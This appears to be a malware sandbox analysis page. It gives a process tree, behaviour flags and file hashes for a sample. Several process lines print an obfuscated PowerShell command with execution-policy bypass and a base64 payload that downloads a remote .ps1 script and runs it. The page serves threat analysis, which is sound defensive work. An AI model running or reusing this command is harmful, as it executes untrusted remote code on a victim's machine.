C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:812
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2160
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4004
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7d3c59980133e790046e51abc446947d
SHA1b290406160be7e70d97a67fffc6181fd13685ec7
SHA256a219628767f86560c9a737ff2de538877989a40981d97035f7a82e13ca3dcb31
SHA5128ea41f0e99ce0dc6d6493025440ec889ffb03b648f8f0f3d69edaea211d62db55c0d9180da0bc2fb8a1359d592adf7830e091fda49bc07f36dc7f9003f33a5e6
-
MD5
d41b3fc33334bb364961acb1b657bedb
SHA10fc32c4069831048b7160e52e12363e79169bdd1
SHA256b6099eb746c97227d02a01b83698546ee1602a64bd4387f250522ba82f49a47c
SHA5121dc96950e4b081991b3c95cbd149fb255192eda254f506d742ba55fb46877378629f96202a99296142ffa6d52352ade37f54f83bfd1c56dd8702e3c91f7ee83f
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
b898b51a4248bca6b7845652bdc104c4
SHA17f8b2d9b32ac9cff983a7f9f88daf741db5bfb27
SHA256156c6af2b92ae424573f6965b20b666ba26a9863e96aa2a799c32e386e9eb037
SHA512119b7eefa328e50325511090fbcb5ea1b41b74be6e11fd6e87339eea6f2a454715afa21920bd91e176019e19f0a8899406f52edbc6099eed394d466b85870031
-
MD5
1403f9ec4f8d64a087c540200b353553
SHA13b483cc9c2c7d7dcce647c8e2fd840dec394bc1f
SHA2560ed9622fe225131820379eea76fe1320ce049e3c5c92501cdda2ac40dacc5503
SHA512e6554c62585d428f229e08a6d8e8fa93cafd0d87d309173221cfa9b07d4debf36c55efff25b89f68cfa98577c347369a41d49705e22c117875faf3d988dc66dd
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
b1f603b8d6a4e672f4f64872a1b44ce4
SHA1fef92eb8e7a193368c53967a489b1c326f7dcc32
SHA256187185078db422f88678f4b15f859344e890c70408c14f6cdbdc93044bb0c64e
SHA512be74ef8176e1e002a275ce2ba589b6442d1dc21358d38d21e07256ab751eb1c9305173e894e6d32f96c245fa4b2ead76f5632f16cc96aac1b590836ae8b5a702
-
MD5
b7df367405df1d63dd0b77952f864d39
SHA10a4ead8259be4064ee7403833749bcb5a7464d72
SHA25657214113a306cb06d2f41b4092c0c0ad3945ee7f5a8cc9381cfb4ba9ac2d8fc6
SHA5128f2edf67b7d832255c41db8169b0e26b91e0082fbd1be68d3ee090067071bd7003605fb4aed450c9507541f0c39312c5bba6998320a26423354217d90d5408f4
-
MD5
5cfa3b3e19ba458fc1459abd524532fd
SHA124b8d9f57c1a10b58b6962dcfc21405a6fd0b756
SHA256b5e776f84f8f01fcc1fb822ff5612afe62097bf367ced2187fda0b5bf3d652ee
SHA5123713961ce9a8edacc91acbf3958e190026bf9a7736fa1ee5b9dbfda9c58a72cfeb04c3699314339ee560bf7f97020abe08f692635b942c2b3ecafb1679c50b4b